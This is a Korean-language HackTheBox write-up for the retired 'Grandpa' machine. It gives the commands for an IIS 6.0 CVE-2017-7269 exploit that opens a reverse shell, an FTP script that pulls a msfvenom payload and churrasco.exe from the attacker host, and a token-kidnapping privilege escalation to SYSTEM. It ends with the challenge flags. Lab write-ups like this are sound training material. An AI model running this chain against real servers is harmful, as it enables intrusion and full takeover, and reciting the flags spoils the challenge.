[HTB] Grandpa Writeup

nmap -sC -sS -sV -O -p- -o scanResult.txt 10.129.95.233

I활성화 되어있는 80포트에서 IS httpd 6.0 서비스를 사용중인걸 알 수 있었고, 접근해보니 아래와 같은 페이지가 나타났다. 

IIS 6.0 exploit 등 키워드로 검색 결과 아래 레퍼런스를 얻을 수 있었고, 리버스 쉘을 획득하는데 성공했다.

https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell

GitHub - g0rx/iis6-exploit-2017-CVE-2017-7269: iis6 exploit 2017 CVE-2017-7269

wget https://raw.githubusercontent.com/g0rx/iis6-exploit-2017-CVE-2017-7269/master/iis6%20reverse%20shell -O iis6rs.py

nc -nvlp 1234

python iis6rs.py 10.129.95.233 80 10.10.14.19 1234

 

권한 상승을 위해 systeminfo 명령어를 통해 정보를 수집했다.

systeminfo

 

wes.py를 통해 systeminfo를 기준으로한 알려진 취약점 중, 권한 상승에 대한 취약점을 검색해봤다.

python3 /usr/local/lib/python3.9/dist-packages/wes.py systeminfo.txt -i "Privilege" -e > wesResultPrivescOnly.txt

그 중, Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation(6705) - churrasco.exe 를 사용하기로 했다.

 

churrasco.exe는 시스템권한으로 명령을 실행해주는 기능이 있었기 때문에 ftp를 통해 churrasco와 reverse shell 실행파일(msfvenom활용)을 서버로 옮긴 뒤 시스템권한으로 리버스 쉘을 획득하였다.

cp /usr/share/sqlninja/apps/churrasco.exe ./

#ftp command line
pip install pyftpdlib
python -m pyftpdlib -p 21 (kali)

# windows -> kali connect
echo open 10.10.14.19(kali) 21> ftp.txt&echo USER anonymous >> ftp.txt&echo anonymous>> ftp.txt&echo bin>> ftp.txt&echo GET churrasco.exe(exploit.exe) >> ftp.txt&echo bye>> ftp.txt
ftp -v -n -s:ftp.txt

cd C:\wmpub (명령어 실행 권한)
churrasco.exe "C:\wmpub\exploit.exe"

 

FLAG = 

[user] bdff5ec67c3cff017f2bedc146a5d869

[root] 9359e905a2c35f861f6a57cecf28bb7b